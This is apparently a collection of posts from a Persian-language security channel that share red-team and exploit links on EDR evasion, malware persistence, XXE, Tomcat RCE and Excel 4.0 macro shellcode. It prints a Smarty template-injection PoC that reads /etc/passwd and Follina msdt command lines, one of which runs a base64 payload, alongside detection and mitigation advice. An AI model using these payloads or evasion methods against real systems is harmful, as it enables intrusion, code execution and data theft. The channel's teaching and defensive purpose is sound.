⭕️New technique for shellcode injection to evade AVs and EDRs

https://github.com/Idov31/FunctionStomping
#shellcode #bypass #edr #av
@securation

⭕️ Malware development: persistence - part 1. Registry run keys. C++ example.

Malware development: persistence - part 2. Screensaver hijack. C++ example.

Malware development: persistence - part 3. COM DLL hijack.

Malware development: persistence - part 4. Windows services. Simple C++ example.

Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.

Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.

Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example.

#malware #dev #cpp
@securation

⭕️ اکسپلویت OOB XXE از طریق متد LOCK در HTTP
https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/

در ارائه زیر که مربوط به کنفرانس Zero Night میشه درباره WebDav XXE attacks صحبت شده ، که متد های PROPPATCH ، PROPFIND ، LOCK و ... XML رو به عنوان ورودی قبول میکنن . و به این موضوع که مخصوصا پیاده سازی های با جاوا آسیب پذیر اند اشاره میکنه.
https://2015.zeronights.org/assets/files/35-Egorov.pdf
#WebDav #LOCK #XXE
@securation

https://github.com/4ra1n/tomcat-jmxproxy-rce-exp

#go #rce #tomcat #vulnerability
@securation

⭕️ Exploiting a heap overflow in the FreeBSD Wi-fi stack

https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack
#heap #freebsd #wifi
@securation

⭕️Smarty PHP Code Injection
< 3.1.45 / >= 4.0.0 / < 4.1.1
CVE-2022-29221

PoC:

{block name='*/phpinfo();/*'}{/block}
{include file='string:*/include"/etc/passwd";exit;/*' inline=1}

#1DAY #smarty #web
@securation

⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات Client access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و...
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:

msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"

ماشین حساب اجرا میشه
و با اجرای :

msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"
اگر جای base64_payload پیلود ما باشه اجرا میشه .

برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :‌
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.

#redteam #follina #exploit #analysis
@securation

FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.

https://github.com/mandiant/flare-floss

#malware #R_String #FLARE
@securation

⭕️VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive

https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/
@securation

⭕️ لینک زیر متدهایی مختلف از تکنیک ها در کشف آسیب پذیری RCE روی CMSهای مختلف آورده که یک Lab هم داره که میتونید روی داکر بالا بیارید و تست بزنید برای یادگیری:

https://github.com/p0dalirius/Awesome-RCE-techniques
#RCE #method #cms
@securation

⭕️ دور زدن HTML Sanitizer API در مرورگر Firefox

HTML Sanitizer API
این Broswer API به برنامه نویس ها اجازه میده تا دیتا نا امن رو از کاربر دریافت کنند و اون رو Sanitize کنند برای رندرینگ امن در DOM
در لینک زیر میتونید بیشتر با این موضوع آشنا بشید
https://developer.mozilla.org/en-US/docs/Web/API/HTML_Sanitizer_API

اما در مقاله زیر از portswigger میبینیم که چطور این API بایپس میشه
https://portswigger.net/research/bypassing-firefoxs-html-sanitizer-api
#API #sanitizer
@securation

⭕️Red Team Note

یکی از تکنیک های مورد استفاده در initial access و یا حتی در lateral movement استفاده از ماکرو ها می باشد.
تکنیک مورد بحث در این پست
xlm macro
میباشد که با این تکنیک شما در قسمت فرمول اکسل به جای فرمول
شل کد تزریق میکنید و ادامه ماجرا..
نکته ای که میتونه مهم کنه این تکنیک رو استفاده نشدن از vba است که قالبا در ماکرو ها ازش استفاده میشه و استفاده اش از ساختار com و win api ها قابلیت دور زدن amsi رو پیدا میکنه که میتونه خیلی برای ما اهمیت داشته باشه.
برای اجرای این تکنیک insert داخل sheet استفاده میکنیم
ms excel 4.0 macro
رو انتخاب میکنیم
از اینجا دیگه میتونیم دستوراتمون رو در هر سلول بنویسیم و البته auto open هم فعال کنیم.
خب حالا از چه روش هایی برای دسترسی میتونیم استفاده کنیم؟
اول اینکه میتونیم دستور cmd اجرا کنیم و بحث nc و امثالهم
دوم اینکه میتونیم با ابزار هایی مثل
https://github.com/mdsecactivebreach/SharpShooter

https://github.com/Synzack/Excel-4.0-Shellcode-Generator

https://github.com/outflanknl/Excel4-DCOM
شل کدی رو ایجاد کنیم
سوم اینکه میتونیم از تکنیک های cobalt strike استفاده کنیم
و در اخر بیایم کمی عمیق شیم در دستوراتش
register()
توابع win api رو فراخوانی میکنه
halt()
اجرای ماکرو رو متوقف میکنه
exec()
یه فایلی رو اجرا میکنه حالا یا اجرایی یا فایل دیگه ای
و..
https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf
که اینجا تمامی توابع هستش.

حالا چجوری استفاده کنیم از این موارد؟
خب در ابتدا با register
win api هارو
فراخوانی میکنیم
و سورس پیلودمون رو بر مبنی .net assembly
کامپایل میکنیم و بعد به شل کد تبدیل میکنیم.
این قسمت null byte های شل کدمون رو حذف میکنیم
و شل کدمون رو تبدیل به ascii میکنیم که در تابع char() قرار میگیره
که با فراخوانی توابع ویندوزی در ابتدا ما شل کدمون رو داخل قسمتی از مموری که ذخیره کرده ایم اجرا میکنیم
ناگفته نمونه
https://github.com/FortyNorthSecurity/EXCELntDonut
این ابزار هم خیلی خوبه که ابزار نوشته شده موسسه ای هست که eyewitness رو نوشتن.
خب بریم سر وقت اینکه چیکارش کنیم؟
چطور جلوگیری بشه ؟
در ابتدا ابزاری برای رفع مبهم سازی ماکرو های این مدل دیدم که به نظر چیز بدرد بخوری میومد
https://github.com/DissectMalware/XLMMacroDeobfuscator

برای جلوگیری ازش هم خب در ورژن های جدید آفیس غیر فعال است
اما باز پالیسی هایی در admx و یا رجیستری هست
https://4sysops.com/archives/restricting-or-blocking-office-2016-2019-macros-with-group-policy/
https://blog.malwarebytes.com/reports/2022/01/microsoft-is-now-disabling-excel-4-0-macros-by-default/
#redteam #amsi #macro #winapi
@securation